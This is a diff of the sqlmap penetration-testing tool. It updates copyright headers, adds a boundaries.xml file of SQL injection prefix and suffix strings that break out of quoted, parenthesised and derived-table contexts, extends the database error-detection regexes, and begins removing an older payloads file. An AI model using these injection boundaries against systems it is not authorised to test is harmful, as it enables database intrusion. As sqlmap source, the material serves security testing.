diff --git a/waf/varnish.py b/waf/varnish.py
index 4edffdbbb..a6f672fd0 100644
--- a/waf/varnish.py
+++ b/waf/varnish.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/webappsecure.py b/waf/webappsecure.py
index 6d1ec75bb..5faf88ebf 100644
--- a/waf/webappsecure.py
+++ b/waf/webappsecure.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/waf/webknight.py b/waf/webknight.py
index c260faa44..11f82ee60 100644
--- a/waf/webknight.py
+++ b/waf/webknight.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/xml/boundaries.xml b/xml/boundaries.xml
new file mode 100644
index 000000000..aa9e75eee
--- /dev/null
+++ b/xml/boundaries.xml
@@ -0,0 +1,582 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!--
+Tag: <boundary>
+    How to prepend and append to the test ' <payload><comment> ' string.
+
+    Sub-tag: <level>
+        From which level check for this test.
+
+        Valid values:
+            1: Always (<100 requests)
+            2: Try a bit harder (100-200 requests)
+            3: Good number of requests (200-500 requests)
+            4: Extensive test (500-1000 requests)
+            5: You have plenty of time (>1000 requests)
+
+    Sub-tag: <clause>
+        In which clause the payload can work.
+
+        NOTE: for instance, there are some payload that do not have to be
+        tested as soon as it has been identified whether or not the
+        injection is within a WHERE clause condition.
+
+        Valid values:
+            0: Always
+            1: WHERE / HAVING
+            2: GROUP BY
+            3: ORDER BY
+            4: LIMIT
+            5: OFFSET
+            6: TOP
+            7: Table name
+            8: Column name
+
+        A comma separated list of these values is also possible.
+
+    Sub-tag: <where>
+        Where to add our '<prefix> <payload><comment> <suffix>' string.
+
+        Valid values:
+            1: When the value of <test>'s <where> is 1.
+            2: When the value of <test>'s <where> is 2.
+            3: When the value of <test>'s <where> is 3.
+
+        A comma separated list of these values is also possible.
+
+    Sub-tag: <ptype>
+        What is the parameter value type.
+
+        Valid values:
+            1: Unescaped numeric
+            2: Single quoted string
+            3: LIKE single quoted string
+            4: Double quoted string
+            5: LIKE double quoted string
+
+    Sub-tag: <prefix>
+        A string to prepend to the payload.
+
+    Sub-tag: <suffix>
+        A string to append to the payload.
+
+Formats:
+    <boundary>
+        <level></level>
+        <clause></clause>
+        <where></where>
+        <ptype></ptype>
+        <prefix></prefix>
+        <suffix></suffix>
+    </boundary>
+
+-->
+
+<root>
+    <!-- Generic boundaries -->
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>)</prefix>
+        <suffix></suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>')</prefix>
+        <suffix></suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1,2,3</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>'</prefix>
+        <suffix></suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>"</prefix>
+        <suffix></suffix>
+    </boundary>
+    <!-- End of generic boundaries -->
+
+    <!-- WHERE/HAVING clause boundaries -->
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>)</prefix>
+        <suffix> AND ([RANDNUM]=[RANDNUM]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>))</prefix>
+        <suffix> AND (([RANDNUM]=[RANDNUM]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>)))</prefix>
+        <suffix> AND ((([RANDNUM]=[RANDNUM]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>0</clause>
+        <where>1,2,3</where>
+        <ptype>1</ptype>
+        <prefix></prefix>
+        <suffix></suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>')</prefix>
+        <suffix> AND ('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>'))</prefix>
+        <suffix> AND (('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>')))</prefix>
+        <suffix> AND ((('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>'</prefix>
+        <suffix> AND '[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>')</prefix>
+        <suffix> AND ('[RANDSTR]' LIKE '[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>'))</prefix>
+        <suffix> AND (('[RANDSTR]' LIKE '[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>')))</prefix>
+        <suffix> AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>'</prefix>
+        <suffix> AND '[RANDSTR]' LIKE '[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>")</prefix>
+        <suffix> AND ("[RANDSTR]"="[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>"))</prefix>
+        <suffix> AND (("[RANDSTR]"="[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>")))</prefix>
+        <suffix> AND ((("[RANDSTR]"="[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>"</prefix>
+        <suffix> AND "[RANDSTR]"="[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>5</ptype>
+        <prefix>")</prefix>
+        <suffix> AND ("[RANDSTR]" LIKE "[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>5</ptype>
+        <prefix>"))</prefix>
+        <suffix> AND (("[RANDSTR]" LIKE "[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>5</ptype>
+        <prefix>")))</prefix>
+        <suffix> AND ((("[RANDSTR]" LIKE "[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>5</ptype>
+        <prefix>"</prefix>
+        <suffix> AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%')</prefix>
+        <suffix> AND ('%'='</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%'))</prefix>
+        <suffix> AND (('%'='</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%')))</prefix>
+        <suffix> AND ((('%'='</suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%'</prefix>
+        <suffix> AND '%'='</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%")</prefix>
+        <suffix> AND ("%"="</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%"))</prefix>
+        <suffix> AND (("%"="</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%")))</prefix>
+        <suffix> AND ((("%"="</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%"</prefix>
+        <suffix> AND "%"="</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%00')</prefix>
+        <suffix> AND ('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%00'))</prefix>
+        <suffix> AND (('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%00')))</prefix>
+        <suffix> AND ((('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>%00'</prefix>
+        <suffix> AND '[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix></prefix>
+        <suffix>-- [RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix></prefix>
+        <suffix># [RANDSTR]</suffix>
+    </boundary>
+    <!-- End of WHERE/HAVING clause boundaries -->
+
+    <!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+    <!-- End of pre-WHERE generic boundaries -->
+
+    <!-- Pre-WHERE derived table boundaries - e.g. "SELECT * FROM (SELECT column FROM table WHERE column LIKE '%$_REQUEST["name"]%') AS t1"-->
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>)) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>-- </suffix>
+    </boundary>
+    <!-- End of pre-WHERE derived table boundaries -->
+
+    <!-- INSERT/UPDATE generic boundaries (e.g. "INSERT INTO table VALUES ('$_REQUEST["name"]',...)"-->
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)||'</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)||'</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>1</ptype>
+        <prefix>'+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)+'</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)+'</suffix>
+    </boundary>
+    <!-- End of INSERT/UPDATE generic boundaries -->
+
+    <!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>' IN BOOLEAN MODE)</prefix>
+        <suffix>#</suffix>
+    </boundary>
+    <!-- End of AGAINST boolean full-text search boundaries -->
+</root>
diff --git a/xml/errors.xml b/xml/errors.xml
index c298e4a5f..ebb7ddd0a 100644
--- a/xml/errors.xml
+++ b/xml/errors.xml
@@ -5,6 +5,7 @@
     <dbms value="MySQL">
         <error regexp="SQL syntax.*MySQL"/>
         <error regexp="Warning.*mysql_.*"/>
+        <error regexp="MySqlException \(0x"/>
         <error regexp="valid MySQL result"/>
         <error regexp="MySqlClient\."/>
         <error regexp="com\.mysql\.jdbc\.exceptions"/>
@@ -17,15 +18,16 @@
         <error regexp="valid PostgreSQL result"/>
         <error regexp="Npgsql\."/>
         <error regexp="org\.postgresql\.util\.PSQLException"/>
+        <error regexp="ERROR:\s\ssyntax error at or near "/>
     </dbms>
 
     <!-- Microsoft SQL Server -->
     <dbms value="Microsoft SQL Server">
         <error regexp="Driver.* SQL[\-\_\ ]*Server"/>
         <error regexp="OLE DB.* SQL Server"/>
-        <error regexp="(\W|\A)SQL Server.*Driver"/>
+        <error regexp="\bSQL Server.*Driver"/>
         <error regexp="Warning.*mssql_.*"/>
-        <error regexp="(\W|\A)SQL Server.*[0-9a-fA-F]{8}"/>
+        <error regexp="\bSQL Server.*[0-9a-fA-F]{8}"/>
         <error regexp="(?s)Exception.*\WSystem\.Data\.SqlClient\."/>
         <error regexp="(?s)Exception.*\WRoadhouse\.Cms\."/>
     </dbms>
@@ -39,7 +41,7 @@
 
     <!-- Oracle -->
     <dbms value="Oracle">
-        <error regexp="ORA-[0-9][0-9][0-9][0-9]"/>
+        <error regexp="\bORA-[0-9][0-9][0-9][0-9]"/>
         <error regexp="Oracle error"/>
         <error regexp="Oracle.*Driver"/>
         <error regexp="Warning.*\Woci_.*"/>
@@ -50,7 +52,7 @@
     <dbms value="IBM DB2">
         <error regexp="CLI Driver.*DB2"/>
         <error regexp="DB2 SQL error"/>
-        <error regexp="db2_\w+\("/>
+        <error regexp="\bdb2_\w+\("/>
     </dbms>
 
     <!-- Informix -->
diff --git a/xml/payloads.xml b/xml/payloads.xml
deleted file mode 100644
index c39d71ede..000000000
--- a/xml/payloads.xml
+++ /dev/null
@@ -1,4522 +0,0 @@
-<?xml version="1.0" encoding="UTF-8"?>
-
-<!--
-Tag: <boundary>
-    How to prepend and append to the test ' <payload><comment> ' string.
-
-    Sub-tag: <level>
-        From which level check for this test.
-
-        Valid values:
-            1: Always (<100 requests)
-            2: Try a bit harder (100-200 requests)
-            3: Good number of requests (200-500 requests)
-            4: Extensive test (500-1000 requests)
-            5: You have plenty of time (>1000 requests)
-
-    Sub-tag: <clause>
-        In which clause the payload can work.
-
-        NOTE: for instance, there are some payload that do not have to be
-        tested as soon as it has been identified whether or not the
-        injection is within a WHERE clause condition.
-
-        Valid values:
-            0: Always
-            1: WHERE / HAVING
-            2: GROUP BY
-            3: ORDER BY
-            4: LIMIT
-            5: OFFSET
-            6: TOP
-            7: Table name
-            8: Column name
-
-        A comma separated list of these values is also possible.
-
-    Sub-tag: <where>
-        Where to add our '<prefix> <payload><comment> <suffix>' string.
-
-        Valid values:
-            1: When the value of <test>'s <where> is 1.
-            2: When the value of <test>'s <where> is 2.
-            3: When the value of <test>'s <where> is 3.
-
-        A comma separated list of these values is also possible.
-
-    Sub-tag: <ptype>
-        What is the parameter value type.
-
-        Valid values:
-            1: Unescaped numeric
-            2: Single quoted string
-            3: LIKE single quoted string
-            4: Double quoted string
-            5: LIKE double quoted string
-
-    Sub-tag: <prefix>
-        A string to prepend to the payload.
-
-    Sub-tag: <suffix>
-        A string to append to the payload.
-
-
-Tag: <test>
-    SQL injection test definition.
-
-    Sub-tag: <title>
-        Title of the test.
-
-    Sub-tag: <stype>
-        SQL injection family type.
-
-        Valid values:
-            0: Heuristic check to parse response errors
-            1: Boolean-based blind SQL injection
-            2: Error-based queries SQL injection
-            3: UNION query SQL injection
-            4: Stacked queries SQL injection
-            5: Time-based blind SQL injection
-            6: Inline queries SQL injection
-
-    Sub-tag: <level>
-        From which level check for this test.
-
-        Valid values:
-            1: Always (<100 requests)
-            2: Try a bit harder (100-200 requests)
-            3: Good number of requests (200-500 requests)
-            4: Extensive test (500-1000 requests)
-            5: You have plenty of time (>1000 requests)
-
-    Sub-tag: <risk>
-        Likelihood of a payload to damage the data integrity.
-
-        Valid values:
-            0: No risk
-            1: Low risk
-            2: Medium risk
-            3: High risk
-
-    Sub-tag: <clause>
-        In which clause the payload can work.
-
-        NOTE: for instance, there are some payload that do not have to be
-        tested as soon as it has been identified whether or not the
-        injection is within a WHERE clause condition.
-
-        Valid values:
-            0: Always
-            1: WHERE / HAVING
-            2: GROUP BY
-            3: ORDER BY
-            4: LIMIT
-            5: OFFSET
-            6: TOP
-            7: Table name
-            8: Column name
-
-        A comma separated list of these values is also possible.
-
-    Sub-tag: <where>
-        Where to add our '<prefix> <payload><comment> <suffix>' string.
-
-        Valid values:
-            1: Append the string to the parameter original value
-            2: Replace the parameter original value with a negative random
-               integer value and append our string
-            3: Replace the parameter original value with our string
-
-    Sub-tag: <vector>
-        The payload that will be used to exploit the injection point.
-
-    Sub-tag: <request>
-        What to inject for this test.
-
-        Sub-tag: <payload>
-            The payload to test for.
-
-        Sub-tag: <comment>
-            Comment to append to the payload, before the suffix.
-
-        Sub-tag: <char>
-            Character to use to bruteforce number of columns in UNION
-            query SQL injection tests.
-
-        Sub-tag: <columns>
-            Range of columns to test for in UNION query SQL injection
-            tests.
-
-    Sub-tag: <response>
-        How to identify if the injected payload succeeded.
-
-        Sub-tag: <comparison>
-            Perform a request with this string as the payload and compare
-            the response with the <payload> response. Apply the comparison
-            algorithm.
-
-            NOTE: useful to test for boolean-based blind SQL injections.
-
-        Sub-tag: <grep>
-            Regular expression to grep for in the response body.
-
-            NOTE: useful to test for error-based SQL injection.
-
-        Sub-tag: <time>
-            Time in seconds to wait before the response is returned.
-
-            NOTE: useful to test for time-based blind and stacked queries
-            SQL injections.
-
-        Sub-tag: <union>
-            Calls unionTest() function.
-
-            NOTE: useful to test for UNION query (inband) SQL injection.
-
-        Sub-tag: <oob>
-            # TODO
-
-    Sub-tag: <details>
-        Which details can be infered if the payload succeed.
-
-        Sub-tags: <dbms>
-            What is the database management system (e.g. MySQL).
-
-        Sub-tags: <dbms_version>
-            What is the database management system version (e.g. 5.0.51).
-
-        Sub-tags: <os>
-            What is the database management system underlying operating
-            system.
-
-Formats:
-    <boundary>
-        <level></level>
-        <clause></clause>
-        <where></where>
-        <ptype></ptype>
-        <prefix></prefix>
-        <suffix></suffix>
-    </boundary>
-
-    <test>
-        <title></title>
-        <stype></stype>
-        <level></level>
-        <risk></risk>
-        <clause></clause>
-        <where></where>
-        <vector></vector>
-        <request>
-            <payload></payload>
-            <comment></comment>
-            <char></char>
-            <columns></columns>
-        </request>
-        <response>
-            <comparison></comparison>
-            <grep></grep>
-            <time></time>
-            <union></union>
-            <oob></oob>
-        </response>
-        <details>
-            <dbms></dbms>
-            <dbms_version></dbms_version>
-            <os></os>
-        </details>
-    </test>
--->
-
-<root>
-    <!-- Generic boundaries -->
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix>)</prefix>
-        <suffix></suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>')</prefix>
-        <suffix></suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1,2,3</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>'</prefix>
-        <suffix></suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>4</ptype>
-        <prefix>"</prefix>
-        <suffix></suffix>
-    </boundary>
-    <!-- End of generic boundaries -->
-
-    <!-- WHERE/HAVING clause boundaries -->
-    <boundary>
-        <level>1</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix>)</prefix>
-        <suffix> AND ([RANDNUM]=[RANDNUM]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>2</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix>))</prefix>
-        <suffix> AND (([RANDNUM]=[RANDNUM]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix>)))</prefix>
-        <suffix> AND ((([RANDNUM]=[RANDNUM]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>1</level>
-        <clause>0</clause>
-        <where>1,2,3</where>
-        <ptype>1</ptype>
-        <prefix></prefix>
-        <suffix></suffix>
-    </boundary>
-
-    <boundary>
-        <level>1</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>')</prefix>
-        <suffix> AND ('[RANDSTR]'='[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>2</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>'))</prefix>
-        <suffix> AND (('[RANDSTR]'='[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>')))</prefix>
-        <suffix> AND ((('[RANDSTR]'='[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>1</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>'</prefix>
-        <suffix> AND '[RANDSTR]'='[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>2</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>3</ptype>
-        <prefix>')</prefix>
-        <suffix> AND ('[RANDSTR]' LIKE '[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>3</ptype>
-        <prefix>'))</prefix>
-        <suffix> AND (('[RANDSTR]' LIKE '[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>3</ptype>
-        <prefix>')))</prefix>
-        <suffix> AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>2</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>3</ptype>
-        <prefix>'</prefix>
-        <suffix> AND '[RANDSTR]' LIKE '[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>2</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>4</ptype>
-        <prefix>")</prefix>
-        <suffix> AND ("[RANDSTR]"="[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>4</ptype>
-        <prefix>"))</prefix>
-        <suffix> AND (("[RANDSTR]"="[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>4</ptype>
-        <prefix>")))</prefix>
-        <suffix> AND ((("[RANDSTR]"="[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>2</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>4</ptype>
-        <prefix>"</prefix>
-        <suffix> AND "[RANDSTR]"="[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>5</ptype>
-        <prefix>")</prefix>
-        <suffix> AND ("[RANDSTR]" LIKE "[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>5</ptype>
-        <prefix>"))</prefix>
-        <suffix> AND (("[RANDSTR]" LIKE "[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>5</ptype>
-        <prefix>")))</prefix>
-        <suffix> AND ((("[RANDSTR]" LIKE "[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>5</ptype>
-        <prefix>"</prefix>
-        <suffix> AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
-    </boundary>
-
-    <boundary>
-        <level>2</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%')</prefix>
-        <suffix> AND ('%'='</suffix>
-    </boundary>
-
-    <boundary>
-        <level>3</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%'))</prefix>
-        <suffix> AND (('%'='</suffix>
-    </boundary>
-
-    <boundary>
-        <level>4</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%')))</prefix>
-        <suffix> AND ((('%'='</suffix>
-    </boundary>
-
-    <boundary>
-        <level>1</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%'</prefix>
-        <suffix> AND '%'='</suffix>
-    </boundary>
-
-    <boundary>
-        <level>5</level>
-        <clause>1</clause>
-        <where>1,2</where>
-        <ptype>2</ptype>
-        <prefix>%00')</prefix>
